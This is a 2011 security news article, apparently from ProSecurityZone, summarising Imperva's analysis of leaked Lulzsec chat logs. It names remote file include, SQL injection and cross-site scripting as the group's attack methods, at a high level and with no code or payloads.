Free Newsletter
Register for our Free Newsletters
Newsletter
Zones
Access Control
LeftNav
Alarms
LeftNav
Biometrics
LeftNav
Detection
LeftNav
Deutsche Zone (German Zone)
LeftNav
Education, Training and Professional Services
LeftNav
Government Programmes
LeftNav
Guarding, Equipment and Enforcement
LeftNav
Industrial Computing Security
LeftNav
IT Security
LeftNav
Physical Security
LeftNav
Surveillance
LeftNav
View All
Other Carouselweb publications
Carousel Web
Defense File
New Materials
Pro Health Zone
Pro Manufacturing Zone
Pro Security Zone
Web Lec
 
ProSecurityZone Sponsor
 
ProSecurityZone Sponsor
 
ProSecurityZone Sponsor
 
ProSecurityZone Sponsor
 
ProSecurityZone Sponsor
 
ProSecurityZone Sponsor
 
 
News

Lulzsec Chat Log Analysis From Imperva

Imperva : 30 June, 2011  (Technical Article)
Analysing chat logs from Lulzsec provided Imperva with insight into the three routes used by the team to carry out their attacks
Lulzsec Chat Log Analysis From Imperva

Imperva has analysed the chat logs from Lulzsec that were provided in the Guardian.  This involved an analysus of the technical approach used to bring down websites and steal data. 


Lulzsec was a team of hackers focused on breaking applications and databases.  There were no virus or malware experts.  Even their approach to distributed denial of service (DDoS) attacks relied on weaknesses in applications. We hope this episode helps bring attention to the fact that the center of gravity has shifted from firewalls and anti-virus to applications and databases.  For security, this does not mean “we have updated our anti-virus and put in place a network firewall.”  Rather, it means “we have identified all sensitive data and have put in place technology with the audit and protection capabilities required to safeguard that data.”


Here's a breakdown of the major technical tools used to hack sites worldwide:


 


1 - Tool #1:  Remote File Include


The relevant snippet from the chat log stated:




"lol - storm would you also like the RFI/LFI bot with google bypass i was talking about while i have this plugged in?"


lol is Kayla who brought a bot army to Lulsec’s toolbox.  The key in this snippet is “RFI” or remote file include. Lulzsec used RFI to get bots to DDoS websites, which is how they brought down the CIA public site.


RFI “attacks have the potential to cause as much damage as the more popular SQL Injection and Cross-Site Scripting (XSS) attacks."  We also noted that RFI is "not widely discussed.”  The key here is “not widely discussed.”  In other words, Lulzsec used an often overlooked vulnerability to help ambush their targets.  An RFI attack inserts some nasty code into a web application server.  What does the code do?  Usually, RFI is used to take over the web application and steal data.  In the case of Lulzsec, they used it to conduct DDoS attacks.  The second line, “8,000 RFI with usp flooder” tells you that lol had 8000 infected servers (not PCs!) to conduct the DDoS attacks.  That’s pretty sizable.  How much so? In our webinar on DDoS 2.0, we estimated that one infected server is equal to 3,000 bot infected PCs, so 8,000 server would be like 2.5M PCs.

 


2 - Tool #2:  SQL Injection




Jun 03 13:18:44 [redacted] you mean with the coupons?

Jun 03 13:18:57 [redacted] was it from that SQLi

Jun 03 13:21:57 sabu yeah


Volumes have been written about SQL injection.  What more can we possibly write about the biggest vulnerability in the history of mankind that is the cause of millions of lost data records?  We described in detail here how SQL injection may have helped with the PBS hack.


 


3 - Tool #3:  Cross Site Scripting




May 31 11:19:38 [redacted] XSS in billoreilly lol


Again, volumes on XSS.  What more can we possibly write about the 2nd biggest vulnerability in the history of mankind that is the cause of millions of lost data records?

Bookmark and Share
 
Home I Editor's Blog I News by Zone I News by Date I News by Category I Special Reports I Directory I Events I Advertise I Submit Your News I About Us I Guides
 
   © 2012 ProSecurityZone.com
Netgains Logo